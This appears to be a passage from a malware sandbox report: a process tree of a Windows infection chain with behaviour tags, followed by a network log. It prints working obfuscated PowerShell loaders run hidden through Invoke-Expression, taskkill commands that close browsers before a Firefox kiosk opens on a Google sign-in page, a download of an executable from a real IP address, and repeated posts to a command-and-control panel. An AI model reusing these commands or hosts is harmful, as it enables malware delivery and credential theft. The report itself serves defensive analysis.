4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3020
      - C:\Users\Admin\AppData\Local\Temp\10369560101\d744367ecb.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369560101\d744367ecb.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1864
      - C:\Users\Admin\AppData\Local\Temp\10369570101\5cf0a9b56c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369570101\5cf0a9b56c.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:2860
      - C:\Users\Admin\AppData\Local\Temp\10369580101\57dbff855a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369580101\57dbff855a.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1264
      - C:\Users\Admin\AppData\Local\Temp\10369590101\ef157868ff.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369590101\ef157868ff.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3020
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM firefox.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2312
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM chrome.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:1256
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM msedge.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:992
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM opera.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:2888
        
        C:\Windows\SysWOW64\taskkill.exe
        
        taskkill /F /IM brave.exe /T
        7⤵
        System Location Discovery: System Language Discovery
        Kills process with taskkill
        Suspicious use of AdjustPrivilegeToken
        
        PID:796
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking
        7⤵
        
        PID:2976
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking
        8⤵
        Checks processor information in registry
        Modifies registry class
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:2912
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2912.0.50006005\613401117" -parentBuildID 20221007134813 -prefsHandle 1216 -prefMapHandle 1208 -prefsLen 21005 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a7c5473a-11fa-42f6-a526-8ab8946729e2} 2912 "\\.\pipe\gecko-crash-server-pipe.2912" 1280 11fd9458 gpu
        9⤵
        
        PID:1564
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2912.1.1353773033\515011638" -parentBuildID 20221007134813 -prefsHandle 1484 -prefMapHandle 1480 -prefsLen 21866 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {b5aa1d30-bf06-4205-ad37-223ae0e96987} 2912 "\\.\pipe\gecko-crash-server-pipe.2912" 1496 e71558 socket
        9⤵
        
        PID:2892
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2912.2.2007791471\1585056513" -childID 1 -isForBrowser -prefsHandle 2044 -prefMapHandle 2040 -prefsLen 21904 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0e04190d-013d-4e2d-ac55-b27c4f2a43ff} 2912 "\\.\pipe\gecko-crash-server-pipe.2912" 2060 1a6adb58 tab
        9⤵
        
        PID:656
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2912.3.951158596\1648009126" -childID 2 -isForBrowser -prefsHandle 2900 -prefMapHandle 2896 -prefsLen 26374 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {492a8f0d-1550-4653-a7c6-df4cd05f77e3} 2912 "\\.\pipe\gecko-crash-server-pipe.2912" 2912 1b763558 tab
        9⤵
        
        PID:1992
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2912.4.372753522\613376106" -childID 3 -isForBrowser -prefsHandle 3744 -prefMapHandle 3740 -prefsLen 26433 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {a5ad01e5-1743-4671-a2ae-e6c8141fa088} 2912 "\\.\pipe\gecko-crash-server-pipe.2912" 3752 1ed1c458 tab
        9⤵
        
        PID:1256
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2912.5.1687653682\414995475" -childID 4 -isForBrowser -prefsHandle 3864 -prefMapHandle 3868 -prefsLen 26433 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {9e5d2501-2efe-41bc-902e-3d3ceabc9406} 2912 "\\.\pipe\gecko-crash-server-pipe.2912" 3852 1ed1eb58 tab
        9⤵
        
        PID:2040
        
        C:\Program Files\Mozilla Firefox\firefox.exe
        
        "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2912.6.214322817\1208165664" -childID 5 -isForBrowser -prefsHandle 4076 -prefMapHandle 4084 -prefsLen 26433 -prefMapSize 233444 -jsInitHandle 836 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {0a720ba0-645b-4a7e-87d5-0e67ae621786} 2912 "\\.\pipe\gecko-crash-server-pipe.2912" 4064 1ed1dc58 tab
        9⤵
        
        PID:880
      - C:\Users\Admin\AppData\Local\Temp\10369600101\b62397d435.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369600101\b62397d435.exe"
        6⤵
        Modifies Windows Defender DisableAntiSpyware settings
        Modifies Windows Defender Real-time Protection settings
        Modifies Windows Defender TamperProtection settings
        Modifies Windows Defender notification settings
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Windows security modification
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3520
      - C:\Users\Admin\AppData\Local\Temp\10369610101\db9f551680.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369610101\db9f551680.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3720
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369610101\db9f551680.exe"
        7⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3868
      - C:\Users\Admin\AppData\Local\Temp\10369620101\a8ea2df2fa.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369620101\a8ea2df2fa.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Loads dropped DLL
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4004
        
        C:\Users\Admin\AppData\Local\Temp\svchost015.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369620101\a8ea2df2fa.exe"
        7⤵
        Executes dropped EXE
        
        PID:3236
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10369631121\8BNn7ce.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3372
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10369631121\8BNn7ce.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3380
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3428
      - C:\Users\Admin\AppData\Local\Temp\10369640101\u75a1_003.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369640101\u75a1_003.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3768
      - C:\Users\Admin\AppData\Local\Temp\10369650101\565605dfbd.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369650101\565605dfbd.exe"
        6⤵
        Executes dropped EXE
        
        PID:3876
        
        C:\Windows\system32\WerFault.exe
        
        C:\Windows\system32\WerFault.exe -u -p 3876 -s 64
        7⤵
        Loads dropped DLL
        
        PID:3972

Network

GET

http://176.113.115.7/mine/random.exe

powershell.exe

Remote address:

176.113.115.7:80

Request

GET /mine/random.exe HTTP/1.1
Host: 176.113.115.7
Connection: Keep-Alive

Response

HTTP/1.1 200 OK

Date: Sat, 29 Mar 2025 13:58:36 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Sat, 29 Mar 2025 13:18:14 GMT
ETag: "1c6400-6317b04fd38f9"
Accept-Ranges: bytes
Content-Length: 1860608
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:58:46 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 156
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:58:48 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:58:52 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:58:58 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:59:02 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://176.113.115.6/Ni9kiput/index.php

rapes.exe

Remote address:

176.113.115.6:80

Request

POST /Ni9kiput/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 176.113.115.6
Content-Length: 32
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Sat, 29 Mar 2025 13:59:07 GMT
